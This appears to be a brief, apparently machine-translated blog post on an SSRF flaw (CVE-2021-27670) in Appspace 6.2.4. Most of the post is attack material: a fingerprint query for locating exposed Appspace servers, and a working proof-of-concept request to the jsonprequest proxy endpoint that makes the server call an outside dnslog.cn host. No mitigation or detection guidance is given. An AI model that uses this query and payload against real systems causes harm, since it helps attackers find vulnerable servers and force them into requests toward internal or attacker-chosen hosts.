Post

Appspace Jsonprequest Ssrf Vulnerability Cve 2021 27670

Posted Updated
By Rhy0z
1 min read
Appspace Jsonprequest Ssrf Vulnerability Cve 2021 27670

Appspace jsonprequest SSRF vulnerability CVE-2021-27670

Vulnerability Description

There is a vulnerability in Appspace 6.2.4, allowing server request forgery through the api/v1/core/proxy/jsonprequest interface, endangering system security.

Vulnerability Impact

Appspace 6.2.4

Network surveying and mapping

app=”Sign-in-to-Appspace-Core”

Vulnerability reappears

The login page is

img

Verify POC

1

/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=https://lo2z02.dnslog.cn

img

This post is licensed under CC BY 4.0 by the author.